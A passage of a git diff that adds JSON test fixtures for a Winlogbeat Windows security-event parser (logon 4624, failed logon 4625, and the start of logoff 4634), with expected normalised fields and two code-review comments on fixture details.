Beats/winlogbeat/tests/security_event_4769.json create mode 100644 Beats/winlogbeat/tests/security_event_4798.json diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..9e8cdfb26 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json 
@@ -0,0 +1,145 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + 
"hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..ac5882d46 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json 
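Review bot: The expected block of this 4624 fixture pins `related` to `hosts` only, with no `related.user`, although the same output carries `user.name` (`WS-USER-01$`) and `user.target.name` (`target_user`), while the 4634 fixture added by this commit expects `related.user: ["ACCOUNT"]`. If the parser is meant to populate `related.user` for logon events, the expected object here would need `"user": ["WS-USER-01$", "target_user"]` under `related`; if it is not, the asymmetry deserves a comment in the parser rather than being silently codified by the fixture. The input also carries `SubjectDomainName: "DOMAIN"` yet no `user.domain` appears in the expected output, whereas the 4634 expected output does set `user.domain`, so the same question applies there. Separately, this file and the new 4625 and 4634 fixtures all end with `\ No newline at end of file`; adding the trailing newline keeps future diffs of these fixtures clean.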
@@ -0,0 +1,193 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\
"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" 
+ ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + 
"hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..ddc69e63b --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json 
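Review bot: The expected `source` object pins `"port": 0` for an event whose `IpPort` and `IpAddress` are both `"-"`; 0 is a legitimate port number, so the fixture asserts a fabricated value instead of the absence of a source port, and any detection that filters on `source.port` will see this failed logon as if a port had been reported. If the parser is intended to skip the port when the field is a dash, the expected block should omit `source.port` and the parser be adjusted to match; if the 0 is a deliberate sentinel, a comment in the parser documenting it would help rule authors. In the same hunk `source.address` and `source.domain` are both expected as `WORKSTATION`, which appears to be taken from `WorkstationName`; that looks intentional but is worth confirming since the same value is also asserted in `related.hosts`.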
@@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 